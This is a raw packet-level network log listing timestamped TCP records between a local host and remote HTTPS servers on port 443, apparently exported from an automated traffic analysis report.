                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.716000080 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.716164112 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.716841936 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.716917038 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.716948986 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.719408035 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.719549894 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.719558954 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.719640017 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.721462011 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.721616983 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.726264954 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.726438999 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.732992887 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.733087063 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.739897013 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.739969969 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.743951082 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.744050026 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.750560999 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.750689030 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.753806114 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.753885984 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.760730028 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.760787964 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.761467934 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.761486053 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.789779902 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.789877892 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.789910078 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.801846981 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.801856041 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.801919937 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.801954985 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.801973104 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.806818962 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.806871891 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.806898117 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.806943893 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.816118956 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.816127062 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.816179991 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.825959921 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.825967073 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.826035976 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.833282948 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.833291054 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.833344936 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.837331057 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.837399006 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.837559938 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.837568998 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.837625027 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.839488983 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.839607954 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.841629982 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.841691971 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.841716051 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.841733932 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.841808081 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842065096 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842083931 CET44349778104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842092037 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842291117 CET49778443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842433929 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842473984 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842575073 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842811108 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.842911005 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.843290091 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.843307972 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.844655991 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.844724894 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.847615004 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.847702026 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.854602098 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.855503082 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.855519056 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.855865955 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.856405973 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.856426954 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.856431961 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.856478930 CET44349780104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.859019995 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.859035015 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.859078884 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.859087944 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.859102964 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.859143972 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.859149933 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.866590977 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.866637945 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.866662025 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.866677046 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.866693020 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.866823912 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.876400948 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.876507044 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.876535892 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.876562119 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.876667976 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.876667976 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.876688004 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.876945972 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.877736092 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.877950907 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.879334927 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.879642963 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.879653931 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.879983902 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.880651951 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.880651951 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.880665064 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.880716085 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.882952929 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.883068085 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.888070107 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.888145924 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.888478041 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.888504982 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.888648033 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.888648033 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.888662100 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.888736963 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.893259048 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.893381119 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.895941019 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.896136045 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.898504972 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.898554087 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.898607016 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.898621082 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.898678064 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.898678064 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.900485039 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.900676966 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.901465893 CET49780443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.904537916 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.904652119 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.908268929 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.908905983 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.909060001 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.909104109 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.909162998 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.909177065 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.909190893 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.909225941 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.913178921 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.913296938 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.918087959 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.918227911 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.920528889 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.920625925 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.932745934 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.932759047 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.932801962 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.932828903 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.932842970 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.932976007 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.933888912 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.936703920 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.936983109 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.937000990 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.937366962 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.937805891 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.937874079 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.938333988 CET49782443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.940787077 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.941076994 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.941122055 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.941461086 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.941979885 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.942099094 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.942105055 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.942111015 CET44349779104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.950114012 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.950145006 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.950623989 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.950634003 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.950685024 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.966263056 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.966300964 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.966710091 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.966710091 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.966717958 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.966831923 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.981231928 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.981259108 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.981453896 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.981462002 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.981575966 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.983338118 CET44349782104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.994910002 CET49779443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.998678923 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.998707056 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.998749971 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.998759031 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.998802900 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:40.998802900 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.038712978 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.038750887 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.038861036 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.038861036 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.038883924 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.039088011 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.047251940 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.047271967 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.047333956 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.047350883 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.047437906 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.055062056 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.055080891 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.055366993 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.055381060 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.055661917 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.064044952 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.064060926 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.064155102 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.064155102 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.064174891 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.064263105 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.071830034 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.071867943 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.071999073 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.071999073 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.072011948 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.080177069 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.080193996 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.080382109 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.080393076 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093262911 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093290091 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093360901 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093379021 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093379021 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093405962 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093420982 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093441963 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093463898 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093566895 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.093568087 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.098967075 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.098987103 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.099070072 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.099097967 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.099116087 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.107232094 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.107276917 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.107307911 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.107352972 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.107378006 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.107667923 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.118643999 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.118674994 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.118815899 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.118815899 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.118838072 CET44349774104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.118922949 CET49774443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.129106998 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.129491091 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.129512072 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.130568981 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.130669117 CET49784443192.168.2.12104.16.102.112
